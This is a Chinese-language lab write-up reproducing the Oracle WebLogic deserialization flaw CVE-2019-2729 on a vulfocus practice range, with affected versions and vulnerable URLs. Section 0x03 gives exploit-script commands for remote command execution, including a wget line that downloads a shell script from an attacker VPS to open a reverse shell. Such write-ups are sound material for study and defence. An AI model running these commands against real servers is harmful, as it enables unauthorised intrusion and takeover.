weblogic反序列化(CVE-2019-2729)复现
@[TOC](weblogic 反序列化 (CVE-2019-2729))
所有⽂章,仅供安全研究与学习之⽤,后果⾃负!
weblogic 反序列化 (CVE-2019-2729)
0x01 漏洞描述
Oracle WebLogic Server是美国甲⾻⽂(Oracle)公司的⼀款适⽤于云环境和传统环境的应⽤服务中间件,它提供了⼀个现代轻型开发平台,⽀持应⽤从开发到⽣产的整个⽣命周期管理,并简化了应⽤的部署和管理。 CVE-2019-2729漏洞是对CVE-2019-2725漏洞补丁进⾏绕过,形成新的漏洞利⽤⽅式,属于CVE-2019-2725漏洞的变形绕过。与CVE-2019-2725漏洞相似,CVE-2019-2729漏洞是由于应⽤在处理反序列化输⼊信息时存在缺陷,攻击者可以通过发送精⼼构造的恶意HTTP请求,⽤于获得⽬标服务器的权限,并在未授权的情况下执⾏远程命令,最终获取服务器的权限。
该漏洞本质是由于 wls9-async组件在反序列化处理输⼊信息时存在缺陷,未经授权的攻击者可以发送精⼼构造的恶意 HTTP 请求,获取服务器权限,实现远程命令执⾏。
7001端⼝
影响组件:
wls9_async_response.war
wls-wsat.war
漏洞url为
url:port/_async/AsyncResponseService
0x02 影响范围
Oracle WebLogic Server 10.3.6.0.0
Oracle WebLogic Server 12.1.3.0.0
Oracle WebLogic Server 12.2.1.3.0
0x03 漏洞复现
vulfocus靶场
(1)访问下边的url地址 可以 访问 可能存在漏洞
118.193.36.37:44829/_async/AsyncResponseService
(2) 漏洞利⽤地址
/wls-wsat/CoordinatorPortType 抓包访问
贴⼊如下 请求包 修改target 和conmmand即可
⼯具
(1) 查看⽤法
cve漏洞库python oracle-weblogic-deserialize.py -h
(2) 执⾏id命令
python oracle-weblogic-deserialize.py -u 118.193.36.37:63126/ -c id
(3) 获取flag(如果报错timeout 多尝试⼏次)
python oracle-weblogic-deserialize.py -u 118.193.36.37:63126/ -c "ls /tmp"
(4) 下载攻击vps上 连接shell的 cmd.sh⽂件 到指定tmp⽬录
python oracle-weblogic-deserialize.py -u 118.193.36.37:63126/ -c "wget X.X.X.X/cmd.sh -P /tmp"
(5) 看是否下载成功
python oracle-weblogic-deserialize.py -u 118.193.36.37:63126/ -c "ls /tmp"
(6)赋予执⾏权限 后运⾏ cmd.sh 连接失败
ls -l /tmp 命令 没有执⾏成功 不知道赋权失败 还是 执⾏cmd.sh失败
0x04 漏洞修复打补丁

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。